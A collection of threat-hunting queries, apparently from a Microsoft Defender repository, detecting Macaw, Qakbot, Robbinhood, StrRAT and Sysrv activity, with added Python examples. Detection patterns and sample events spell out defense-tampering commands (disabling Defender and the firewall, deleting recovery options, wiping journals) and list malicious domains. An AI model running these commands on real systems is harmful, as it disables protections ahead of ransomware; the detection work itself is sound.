================================================
# Macaw ransomware - Imminent Ransomware

Directly prior to deploying Macaw ransomware in an organization, the attacker will run several commands designed to disable security tools and system recovery tools.

## Query

This query looks for instances where the attacker has run a collection of commands designed to tamper with security tools and system recovery tools.
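The query below works by pooling each device's matching command lines into 6-hour windows, evaluating nine tampering indicators over the pooled set, and alerting only when more than four of them are present. The following Python is an added example, not code from this repository, that reproduces that scoring over constructed sample process events (the device ids and timestamps are hypothetical; the command lines are built from the indicator strings the query itself searches for) so the binning and the threshold can be sanity-checked offline. KQL's `has` matches whole terms; the helper here uses case-insensitive substring matching, which is a slightly looser approximation.

```python
"""Added example, not repository code: emulates the 6-hour evidence scoring
of the Macaw "Imminent Ransomware" hunting query over constructed events."""
from collections import defaultdict
from datetime import datetime


def _has(text, term):
    # Approximation of KQL `has` (term match): case-insensitive substring match.
    return term.lower() in text.lower()


def has_all(text, *terms):
    return all(_has(text, t) for t in terms)


def has_any(text, *terms):
    return any(_has(text, t) for t in terms)


# First pivot of the query: only command lines carrying one of these tokens
# survive into the 6-hour summarize.
PIVOT_TERMS = ("-ExclusionPath", "Set-MpPreference", "advfirewall",
               "-ExclusionExtension", "-EnableControlledFolderAccess",
               "windefend", "onstart", "bcdedit", "Startup")

# One check per `extend ... = iff(...)` column, evaluated over the whole
# make_set() of a device's command lines in a window, as the query does.
INDICATORS = {
    "StartUpExclusionPath": lambda s: has_all(s, "-ExclusionPath", "Startup"),
    "DefenderTamp": lambda s: _has(s, "Set-MpPreference") and has_any(
        s, "-SevereThreatDefaultAction 6", "-HighThreatDefaultAction 6",
        "-ModerateThreatDefaultAction 6", "-LowThreatDefaultAction 6",
        "-ScanScheduleDay 8"),
    "NetshFirewallTampering": lambda s: has_all(s, "netsh", "advfirewall", "allprofiles state off"),
    "BatExclusion": lambda s: has_all(s, "-ExclusionExtension", ".bat"),
    "ExeExclusion": lambda s: has_all(s, "-ExclusionExtension", ".exe"),
    "DisableControlledFolderAccess": lambda s: has_all(s, "-EnableControlledFolderAccess", "Disabled"),
    "ScDeleteDefend": lambda s: has_all(s, "sc", "delete", "windefend"),
    "BootTampering": lambda s: has_all(s, "bcdedit", "default") and has_any(
        s, "recoveryenabled No", "bootstatuspolicy ignoreallfailures"),
    "SchTasks": lambda s: has_all(s, "/sc", "onstart", "system", "/create", "/delay"),
}


def bin_6h(ts):
    """Emulates bin(Timestamp, 6h): floor to 00:00, 06:00, 12:00 or 18:00."""
    return ts.replace(hour=ts.hour - ts.hour % 6, minute=0, second=0, microsecond=0)


def score_events(events, threshold=4):
    """events: iterable of (DeviceId, datetime, ProcessCommandLine).
    Returns {(DeviceId, window_start): {indicator: 0/1, "EvidenceCount": n}}
    for windows whose EvidenceCount exceeds the threshold (the query uses > 4)."""
    windows = defaultdict(list)
    for device, ts, cmd in events:
        if has_any(cmd, *PIVOT_TERMS):
            windows[(device, bin_6h(ts).strftime("%Y-%m-%d %H:%M"))].append(cmd)
    hits = {}
    for key, cmds in windows.items():
        joined = "\n".join(cmds)  # the make_set() array, searched as one string
        flags = {name: int(check(joined)) for name, check in INDICATORS.items()}
        flags["EvidenceCount"] = sum(flags.values())
        if flags["EvidenceCount"] > threshold:
            hits[key] = flags
    return hits


# Constructed sample events (hypothetical device ids and timestamps). DEV-A
# runs six tampering commands in one window; DEV-B is a lone admin exclusion.
SAMPLE_EVENTS = [
    ("DEV-A", datetime(2021, 10, 20, 3, 10), "netsh advfirewall set allprofiles state off"),
    ("DEV-A", datetime(2021, 10, 20, 3, 12), 'powershell Set-MpPreference -ExclusionExtension ".bat"'),
    ("DEV-A", datetime(2021, 10, 20, 3, 13), 'powershell Set-MpPreference -ExclusionExtension ".exe"'),
    ("DEV-A", datetime(2021, 10, 20, 3, 15), "powershell Set-MpPreference -EnableControlledFolderAccess Disabled"),
    ("DEV-A", datetime(2021, 10, 20, 3, 20), "sc delete windefend"),
    ("DEV-A", datetime(2021, 10, 20, 3, 40), "bcdedit /set {default} recoveryenabled No"),
    # Same device, different 6-hour window: scored separately, so not flagged.
    ("DEV-A", datetime(2021, 10, 20, 14, 5), "bcdedit /set {default} bootstatuspolicy ignoreallfailures"),
    ("DEV-B", datetime(2021, 10, 20, 9, 0), 'powershell Set-MpPreference -ExclusionExtension ".bat"'),
]

if __name__ == "__main__":
    for (device, window), flags in score_events(SAMPLE_EVENTS).items():
        print(device, window, "EvidenceCount =", flags["EvidenceCount"])
```

Only `DEV-A`'s 00:00 window reaches an `EvidenceCount` of 6; the single `bcdedit` command in its 12:00 window and `DEV-B`'s one exclusion score 1 each and fall under the threshold, which is the behaviour that keeps isolated administrative changes out of the results.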
```
DeviceProcessEvents
// Pivot on specific commands
| where ProcessCommandLine has_any("-ExclusionPath", "Set-MpPreference", "advfirewall", "-ExclusionExtension", "-EnableControlledFolderAccess", "windefend", "onstart", "bcdedit", "Startup")
// Making list of found commands
| summarize ProcessCommandLine = make_set(ProcessCommandLine) by DeviceId, bin(Timestamp, 6h)
// Extending columns for later aggregation, based on TTP
| extend StartUpExclusionPath = iff(ProcessCommandLine has_all("-ExclusionPath", "Startup"), 1, 0)
| extend DefenderTamp = iff(ProcessCommandLine has "Set-MpPreference" and ProcessCommandLine has_any("-SevereThreatDefaultAction 6", "-HighThreatDefaultAction 6", "-ModerateThreatDefaultAction 6", "-LowThreatDefaultAction 6", "-ScanScheduleDay 8"), 1, 0)
| extend NetshFirewallTampering = iff(ProcessCommandLine has_all("netsh", "advfirewall", "allprofiles state off"), 1, 0)
| extend BatExclusion = iff(ProcessCommandLine has_all("-ExclusionExtension", ".bat"), 1, 0)
| extend ExeExclusion = iff(ProcessCommandLine has_all("-ExclusionExtension", ".exe"), 1, 0)
| extend DisableControlledFolderAccess = iff(ProcessCommandLine has_all("-EnableControlledFolderAccess", "Disabled"), 1, 0)
| extend ScDeleteDefend = iff(ProcessCommandLine has_all("sc", "delete", "windefend"), 1, 0)
| extend BootTampering = iff(ProcessCommandLine has_all("bcdedit", "default") and ProcessCommandLine has_any("recoveryenabled No", "bootstatuspolicy ignoreallfailures"), 1, 0)
| extend SchTasks = iff(ProcessCommandLine has_all("/sc", "onstart", "system", "/create", "/delay"), 1, 0)
// Summarizing found commands
| summarize by NetshFirewallTampering, BatExclusion, ExeExclusion, DisableControlledFolderAccess, ScDeleteDefend, SchTasks, BootTampering, DefenderTamp, StartUpExclusionPath, DeviceId, Timestamp
// Adding up each piece of evidence
| extend EvidenceCount = NetshFirewallTampering + BatExclusion + ExeExclusion + DisableControlledFolderAccess + ScDeleteDefend + SchTasks + BootTampering + DefenderTamp + StartUpExclusionPath
| where EvidenceCount > 4
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | v | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/Macaw Ransomware/Inhibit recovery by disabling tools and functionality.md
================================================
# Macaw ransomware - Inhibit recovery by disabling tools and functionality

Prior to deploying Macaw ransomware in an organization, the adversary will disable several tools and functions in order to inhibit later recovery efforts.

## Query

This query looks for instances where the attacker has disabled various tools, including Task Manager, CMD, and Registry Tools.

```
DeviceProcessEvents
| where ProcessCommandLine has_all ("reg", "add")
| where ProcessCommandLine has_any("DisableTaskMgr", "DisableCMD", "DisableRegistryTools", "NoRun") and ProcessCommandLine has "REG_DWORD /d \"1\""
| summarize ProcessCount = dcount(ProcessCommandLine), make_set(ProcessCommandLine) by InitiatingProcessCommandLine, DeviceId, bin(Timestamp, 3m)
| where ProcessCount > 2
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | v | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/Macaw Ransomware/Mass account password change.md
================================================
# Macaw ransomware - Mass account password change

Prior to deploying Macaw ransomware in an organization, adversaries will change the passwords of hundreds or thousands of accounts in order to lock users out of the network and impede recovery efforts.

## Query

This query looks for instances of attackers changing hundreds of account passwords in short succession.

```
DeviceProcessEvents
| where ProcessCommandLine has_all('user', '/Domain', '/Active:Yes', '/PasswordChg:No')
| summarize commands=count() by DeviceId, bin(Timestamp, 1d)
| where commands > 200
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | v | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/Macaw Ransomware/PSExec Attrib commands.md
================================================
# Macaw ransomware - PSExec Attrib commands

Prior to deploying Macaw ransomware in an organization, adversaries will use Attrib to display file attribute information on multiple drives and all subfolders.

## Query

This query looks for PSExec utilizing a .bat file to run the attrib command with parameters observed in Macaw incidents.

```
DeviceProcessEvents
| where InitiatingProcessParentFileName endswith "PSEXESVC.exe"
| where InitiatingProcessCommandLine has ".bat"
| where FileName =~ "cmd.exe" and ProcessCommandLine has_all("-s", "-h", "-r", "-a", "*.*")
| take 100
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | v | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | v | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/Macaw Ransomware/Use of MSBuild as LOLBin.md
================================================
# Macaw Ransomware - Use of MSBuild.exe as a LOLBin

Prior to deploying Macaw ransomware in an organization, the adversary frequently uses MSBuild.exe as a LOLBin to communicate with the C2.

## Query

This query looks for instances of MSBuild.exe being used as a LOLBin.

```
DeviceProcessEvents
| where InitiatingProcessFileName =~ "wmiprvse.exe"
| where FileName =~ "msbuild.exe" and ProcessCommandLine has "programdata"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/OceanLotus registry activity.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_oceanlotus_registry.yml
// Questions via Twitter: @janvonkirchheim
DeviceRegistryEvents
| where Timestamp > ago(7d)
| where ActionType == "RegistryValueSet"
| where RegistryKey endswith @"\SOFTWARE\Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model"
    or RegistryKey endswith @"\SOFTWARE\App\AppXbf13d4ea2945444d8b13e2121cb6b663\Application"
    or RegistryKey endswith @"\SOFTWARE\App\AppXbf13d4ea2945444d8b13e2121cb6b663\DefaultIcon"
    or RegistryKey endswith @"\SOFTWARE\App\AppX70162486c7554f7f80f481985d67586d\Application"
    or RegistryKey endswith @"\SOFTWARE\App\AppX70162486c7554f7f80f481985d67586d\DefaultIcon"
    or RegistryKey endswith @"\SOFTWARE\App\AppX37cc7fdccd644b4f85f4b22d5a3f105a\Application"
    or RegistryKey endswith @"\SOFTWARE\App\AppX37cc7fdccd644b4f85f4b22d5a3f105a\DefaultIcon"

================================================
FILE: Campaigns/Qakbot/Excel launching anomalous processes.md
================================================
# Excel launching anomalous processes

## Query

Use this query to find Excel launching anomalous processes consistent with Qakbot payloads, which carry additional markers from recent Qakbot executions. The presence of such anomalous processes indicates that the payload was delivered and executed, though reconnaissance and successful implantation have not been completed yet.

```
DeviceProcessEvents
| where InitiatingProcessParentFileName has "excel.exe" or InitiatingProcessFileName =~ "excel.exe"
| where InitiatingProcessFileName in~ ("excel.exe","regsvr32.exe")
| where FileName in~ ("regsvr32.exe", "rundll32.exe")
| where ProcessCommandLine has @"..\"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/Qakbot/General attempts to access local email store.md
================================================
# General attempts to access local email store

## Query

Use this query to find attempts to access files in the local path containing Outlook emails.

```
DeviceFileEvents
| where FolderPath hasprefix "EmailStorage"
| where FolderPath has "Outlook"
| project FileName, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine, DeviceId, Timestamp
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | v | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/Qakbot/Qakbot Craigslist Domains.md
================================================
# Qakbot Craigslist Domains

Qakbot operators have been abusing the Craigslist messaging system to send malicious emails. These emails contain non-clickable links to malicious domains impersonating Craigslist, which the user is instructed to type manually into the address bar.

## Query

This query looks for network connections to domains impersonating Craigslist that are associated with the delivery of Qakbot.

```
DeviceNetworkEvents
| where RemoteUrl matches regex @"abuse\.[a-zA-Z]\d{2}-craigslist\.org"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/Qakbot/Qakbot email theft.md
================================================
# Qakbot email theft

## Query

Use this query to find email-stealing activity run by Qakbot, which uses “ping.exe -t 127.0.0.1” to obfuscate subsequent actions. Stolen email may be exfiltrated to the operators, and its theft indicates that the malware completed a large portion of its automated activity without interruption.

Generic:

```
DeviceFileEvents
| where InitiatingProcessFileName =~ 'ping.exe'
| where FileName endswith '.eml'
```

Specific:

```
DeviceFileEvents
| where InitiatingProcessFileName =~ 'ping.exe'
    and InitiatingProcessCommandLine == 'ping.exe -t 127.0.0.1'
    and InitiatingProcessParentFileName in~('msra.exe', 'mobsync.exe')
    and FolderPath endswith ".eml"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | v | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/Qakbot/Qakbot reconnaissance activities.md
================================================
# Qakbot reconnaissance activities

## Query

Use this query to find reconnaissance and beaconing activity after code injection occurs. The reconnaissance commands are consistent with the current version of Qakbot and run automatically to exfiltrate system information. Once exfiltrated, this data is used to prioritize human-operated actions.

```
DeviceProcessEvents
| where InitiatingProcessFileName == InitiatingProcessCommandLine
| where ProcessCommandLine has_any ("whoami /all","cmd /c set","arp -a","ipconfig /all","net view /all","nslookup -querytype=ALL -timeout=10", "net share","route print","netstat -nao","net localgroup")
| summarize dcount(FileName), make_set(ProcessCommandLine) by DeviceId, bin(Timestamp, 1d), InitiatingProcessFileName, InitiatingProcessCommandLine
| where dcount_FileName >= 8
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? 
(v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | v | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Ransomware hits healthcare - Alternate Data Streams use.txt ================================================ // Find use of Alternate Data Streams (ADS) for anti-forensic purposes. // Alternate Data Streams execution DeviceProcessEvents | where Timestamp > ago(7d) // Command lines used | where ProcessCommandLine startswith "-q -s" and ProcessCommandLine has "-p" // Removing IDE processes and not(FolderPath has_any("visual studio", "ide")) | summarize make_set(ProcessCommandLine), make_set(FolderPath), make_set(InitiatingProcessCommandLine) by DeviceId, bin(Timestamp, 1h) ================================================ FILE: Campaigns/Ransomware hits healthcare - Backup deletion.txt ================================================ // List alerts flagging attempts to delete backup files ​ AlertInfo | where Timestamp > ago(7d) | where Title == "File backups were deleted" | join AlertEvidence on AlertId ================================================ FILE: Campaigns/Ransomware hits healthcare - Cipher.exe tool deleting data.txt ================================================ ​// Look for cipher.exe deleting data from multiple drives. // This is often performed as an anti-forensic measure prior to encryption. 
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "cipher.exe"
// Looking for the /w flag, which overwrites free space on the given drive
| where ProcessCommandLine has "/w"
| summarize CommandCount = dcount(ProcessCommandLine), make_set(ProcessCommandLine) by DeviceId, bin(Timestamp, 1m)
// Looking for multiple drives in a short timeframe
| where CommandCount > 1

================================================
FILE: Campaigns/Ransomware hits healthcare - Clearing of system logs.txt
================================================
// Look for attempts to use fsutil.exe to delete the USN change journal, a file system log that is a useful forensic artifact.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "fsutil.exe" and ProcessCommandLine has "usn" and ProcessCommandLine has "deletejournal"

================================================
FILE: Campaigns/Ransomware hits healthcare - Possible compromised accounts.txt
================================================
// Identify accounts that have logged on to affected endpoints
// Check for specific alerts
AlertInfo
| where Timestamp > ago(7d)
// Attempts to clear security event logs.
| where Title in("Event log was cleared",
    // Alerts flagging attempts to delete backup files.
    "File backups were deleted",
    // Potential Cobalt Strike activity - Note that other threat activity can also
    // trigger alerts for suspicious decoded content
    "Suspicious decoded content",
    // Cobalt Strike activity
    "'Atosev' malware was detected", "'Ploty' malware was detected", "'Bynoco' malware was detected")
| extend AlertTime = Timestamp
| join AlertEvidence on AlertId
| distinct DeviceName, AlertTime, AlertId, Title
| join DeviceLogonEvents on DeviceName
// Creating a 10-day window surrounding the alert activity
| where Timestamp < AlertTime + 5d and Timestamp > AlertTime - 5d
// Projecting specific columns
| project Title, DeviceName, DeviceId, Timestamp, LogonType, AccountDomain, AccountName, AccountSid, AlertTime, AlertId, RemoteIP, RemoteDeviceName

================================================
FILE: Campaigns/Ransomware hits healthcare - Robbinhood activity.txt
================================================
// Find distinct evasion and execution activities
// associated with the Robbinhood ransomware campaign.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName =~ "winlogon.exe"
| where FileName == "cmd.exe" and ProcessCommandLine has_any("taskkill", "net", "robbin", "vssadmin", "bcdedit", "wevtutil")

================================================
FILE: Campaigns/Ransomware hits healthcare - Turning off System Restore.txt
================================================
// Find attempts to stop System Restore and
// prevent the system from creating restore points
DeviceProcessEvents
| where Timestamp > ago(7d)
// Pivoting for rundll32
and InitiatingProcessFileName =~ 'rundll32.exe'
// Requiring a populated rundll32 command line
and isnotempty(InitiatingProcessCommandLine)
// Looking for schtasks.exe as the created process
and FileName in~ ('schtasks.exe')
// Disabling system restore
and ProcessCommandLine has 'Change' and ProcessCommandLine has 'SystemRestore' and ProcessCommandLine has 'disable'

================================================
FILE: Campaigns/Ransomware hits healthcare - Vulnerable Gigabyte drivers.txt
================================================
// Locate vulnerable Gigabyte drivers used by RobbinHood ransomware to turn off security tools
// The indicators below are 64-character hex digests, i.e. SHA-256 values, so they must be
// matched against the SHA256 column; matching them against SHA1 never returns a row.
DeviceFileEvents
| where Timestamp > ago(7d)
| where SHA256 in('0b15b5cc64caf0c6ad9bd759eb35383b1f718edf3d7ab4cd912d0d8c1826edf8', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427')

================================================
FILE: Campaigns/StrRAT malware/StrRAT-AV-Discovery.md
================================================
# StrRAT Malware AV Discovery

StrRAT is a Java-based remote access tool that steals browser credentials, logs keystrokes, and takes remote control of infected systems. It also has a module that downloads additional payloads onto the infected machine on command from the C2 server. Additionally, this threat has a ransomware encryption/decryption module that appends the .crimson extension.
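The Gigabyte driver query above matches file hashes in DeviceFileEvents, and its two indicators are 64-character hex strings, which is the SHA-256 length: placed under the SHA1 column they can never match, and the query silently returns nothing. The Python below is an added example, not part of this repository: it routes each indicator to the column whose digest length it has (MD5, SHA1 or SHA256, all real DeviceFileEvents columns), rejects anything that is not a hex digest, and emits the where-clause. It generalizes to mixed indicator lists; the helper names and the generated `in~()` form are this example's own choices.

```python
"""Route file-hash IOCs to the right DeviceFileEvents column.

Added example, not part of this repository. It assumes only the MD5, SHA1
and SHA256 columns of DeviceFileEvents; the IOC list below is the pair from
the Gigabyte driver query, and the helper names are this example's own.
"""
import re

# Digest length in hex characters -> advanced hunting column holding it.
COLUMN_BY_HEX_LENGTH = {32: "MD5", 40: "SHA1", 64: "SHA256"}
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")

# The two indicators from the Gigabyte driver query: 64 hex characters each,
# which is SHA-256 length, so a SHA1 filter can never match them.
GIGABYTE_IOCS = [
    "0b15b5cc64caf0c6ad9bd759eb35383b1f718edf3d7ab4cd912d0d8c1826edf8",
    "31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427",
]


def column_for(ioc):
    """Return the column an indicator belongs in; raise for anything else."""
    value = ioc.strip()
    if not HEX_RE.match(value):
        raise ValueError(f"not a hex digest: {ioc!r}")
    column = COLUMN_BY_HEX_LENGTH.get(len(value))
    if column is None:
        raise ValueError(f"unsupported digest length {len(value)}: {ioc!r}")
    return column


def is_digest(ioc):
    """True when the indicator is an MD5, SHA-1 or SHA-256 hex digest."""
    try:
        column_for(ioc)
    except ValueError:
        return False
    return True


def group_iocs(iocs):
    """Group indicators by column, lowercased and de-duplicated, keeping order."""
    grouped = {}
    for ioc in iocs:
        column = column_for(ioc)
        value = ioc.strip().lower()
        bucket = grouped.setdefault(column, [])
        if value not in bucket:
            bucket.append(value)
    return grouped


def build_where_clause(iocs):
    """Emit one KQL where-clause that ORs an in~() per hash column.

    in~() is the case-insensitive form, so the case of the stored hash
    does not matter.
    """
    grouped = group_iocs(iocs)
    parts = []
    for column in ("MD5", "SHA1", "SHA256"):  # stable output order
        if column in grouped:
            quoted = ", ".join(f"'{value}'" for value in grouped[column])
            parts.append(f"{column} in~({quoted})")
    if not parts:
        raise ValueError("no indicators supplied")
    return "| where " + " or ".join(parts)


def build_query(iocs, lookback="7d"):
    """Full DeviceFileEvents query in the shape used by this repository."""
    return "\n".join(
        ["DeviceFileEvents", f"| where Timestamp > ago({lookback})", build_where_clause(iocs)]
    )


if __name__ == "__main__":
    print(build_query(GIGABYTE_IOCS))
```

Run directly, it prints a query that filters on `SHA256`; feeding it an MD5 and a SHA-256 together yields two `in~()` terms joined with `or`, and a file name or truncated hash is rejected before it can produce a silently empty filter.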
## Query

The following query looks for discovery behavior used for defense evasion: the malware enumerates the antivirus products registered on the compromised device with a `wmic`-style `path antivirusproduct get displayname` query run through cmd.exe, launched from a Java process under the user's Roaming profile.

```
DeviceProcessEvents
| where InitiatingProcessFileName in~("java.exe", "javaw.exe") and InitiatingProcessCommandLine has "roaming"
| where FileName == 'cmd.exe' and ProcessCommandLine has 'path antivirusproduct get displayname'
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/StrRAT malware/StrRAT-Email-Delivery.md
================================================
# StrRAT Malware Email Delivery

StrRAT is a Java-based remote access tool that steals browser credentials, logs keystrokes, and takes remote control of infected systems. It also has a module that downloads additional payloads onto the infected machine on command from the C2 server. Additionally, this threat has a ransomware encryption/decryption module that appends the .crimson extension.

## Query

The following query looks for emails containing domains known to be associated with delivering StrRAT malware.
```
EmailUrlInfo
| where UrlDomain has_any ('metroscaffingltg.co.uk', 'pg-finacesolutions.co.uk', 'jpfletcherconsultancy.co.uk', 'buildersworlinc.co.uk', 'bentlyconstbuild.co.uk', 'alfredoscafeltd.co.uk', 'zincocorporation.co.uk', 'playerscircleinc.co.uk', 'tg-cranedinc.co.uk', 'adamridley.co.uk', 'westcoasttrustedtaxis.co.uk', 'sivospremiumclub.co.uk', 'gossyexperience.co.uk', 'jeffersonsandc.co.uk', 'fillinaresortsltd.co.uk', 'tk-consultancyltd.co.uk')
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/StrRAT malware/StrRAT-Malware-Persistence.md
================================================
# StrRAT Malware Persistence

StrRAT is a Java-based remote access tool that steals browser credentials, logs keystrokes, and takes remote control of infected systems. It also has a module that downloads additional payloads onto the infected machine on command from the C2 server. Additionally, this threat has a ransomware encryption/decryption module that appends the .crimson extension.

## Query

The following query looks for the scheduled task named "Skype," which the StrRAT JAR file creates to persist on the impacted machine.
``` DeviceProcessEvents | where InitiatingProcessFileName in~("java.exe","javaw.exe") | where FileName == 'cmd.exe' and ProcessCommandLine has_all("schtasks /create", "tn Skype") ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | v | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Sysrv-botnet/app-armor-stopped.md ================================================ # AppArmor service stopped This query was originally published in the threat analytics report, *Sysrv botnet evolution*. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency. The following query finds instances of the attacker attempting to stop the AppArmor network security service on devices running Linux. ## Query ```kusto DeviceProcessEvents | where InitiatingProcessCommandLine 